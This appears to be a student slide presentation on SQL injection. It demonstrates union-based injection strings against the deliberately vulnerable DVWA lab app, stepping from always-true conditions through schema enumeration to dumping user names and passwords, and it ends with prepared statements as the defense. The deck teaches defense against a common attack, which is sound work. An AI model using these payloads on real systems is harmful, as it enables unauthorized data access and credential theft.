SQL Injection
By
Wenonah Abadilla
Topics
• What is SQL
• What is SQL Injection
• Damn Vulnerable Web App
• SQLI Demo
• Prepared Statements
What is SQL?
• Way you communicate with the database
• Structured Query Language
• Access and manipulate databases
• COSC 341 at IUP
What is SQL Injection?
• One of the most serious threats to web applications
• Injects SQL commands into an SQL statement via web page input
• Alters an SQL statement and compromises the security of a web application
• Common with PHP and ASP applications due to the prevalence of older functional interfaces
• Occurs when
  • Data enters a program from an untrusted source
  • That data is used to dynamically construct a SQL query
• SQL Injection Harvesting
  • SQL statements used to render sensitive data
Types of SQLI
• Error Based
  • Causes an error and gathers information from the error message
• Union Based
  • Combines two or more SQL statements into one result
• Blind
  • Asks the database a true or false question
Consequences of SQL Injection
• Confidentiality
• Authentication
• Authorization
• Integrity
Damn Vulnerable Web Site Demo
• PHP/MySQL web application
• Aid for security professionals
• Test skills and tools in a legal environment
• Help developers better understand the process of securing web applications
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Basic Injection
The web page is supposed to print the ID, first name and surname
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'";
Always True Scenario
• Asks the database to display all records for which the condition is false and all records for which it is true
• '%' – probably not equal to any user_id, so this part is false
• '0'='0' – always true, because 0 always equals 0
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0'";
Display Database Version
• Notice the last displayed line
• This is the version of the MySQL database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #";
Display Database User
• Notice the last displayed line
• Name of the database user under which the behind-the-scenes PHP code runs its queries
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #";
Display Database Name
• Notice the last displayed line
• This is the name of the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #";
Display All Tables in the information_schema
• Displays all the tables in the information_schema database
• INFORMATION_SCHEMA is the informational database
• It stores information about all other databases that the MySQL server maintains
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables #";
Display All User Tables in the information_schema
• Quicker than looking through the previous output and manually looking for the user table
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #";
• Displays all tables that start with the prefix "user" in the information_schema database
Display all Column fields in the User Table
• Displays all the columns in the users table
• Notice the user_id, first_name, last_name, user and password columns
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #";
Display Column Field Contents in the User Table
• Successfully displayed all the necessary authentication information in the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #";
Prepared Statements and Bound Parameters
• The query and the data are sent to the SQL server separately
• Also called parameterized statements or parameterized SQL
• A template for SQL statements
• Values can be plugged into the query after the query is "prepared" and ready to be executed
• (?), bound parameters
  • Placeholders where the actual values are plugged in
Examples
Java using JDBC
The prepared statement sets "?" to the actual value stored in the id variable
PHP using PDO
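As an added example (not the deck's own JDBC or PDO code), the slides' `$getid` construction beside its parameterized form. It assumes Python's sqlite3 DB-API `?` placeholders in place of PDO and a constructed in-memory SQLite table standing in for DVWA's MySQL `users` table; the input `%' or '0'='0` is the Always True payload from the slides.

```python
import sqlite3

# Constructed stand-in for DVWA's `users` table (assumption: an in-memory
# SQLite table with the column names the slides show; values are made up).
SAMPLE_USERS = [
    ("1", "admin", "admin", "admin", "<password-hash-placeholder>"),
    ("2", "Gordon", "Brown", "gordonb", "<password-hash-placeholder>"),
    ("3", "Pablo", "Picasso", "pablo", "<password-hash-placeholder>"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    # Same construction as the slides' $getid: the untrusted value is pasted
    # into the SQL text, so a quote in the input changes the statement itself.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_prepared(conn, user_id):
    # Prepared statement: the SQL template is fixed and the value travels
    # separately as a bound parameter for the "?" placeholder, so the
    # database never parses the input as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def compare(user_id):
    # Run one input through both forms and report how many rows each returns.
    conn = make_db()
    try:
        return {
            "vulnerable": len(lookup_vulnerable(conn, user_id)),
            "prepared": len(lookup_prepared(conn, user_id)),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("1"))             # {'vulnerable': 1, 'prepared': 1}
    print(compare("%' or '0'='0"))  # {'vulnerable': 3, 'prepared': 0}
```

With the bound parameter the whole payload is compared literally against user_id, so it matches nothing instead of turning the WHERE clause into an always-true condition.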
Conclusion
• SQLI is a huge threat to web applications
• Use Prepared SQL Statements
• Download Damn Vulnerable Web App
Questions?
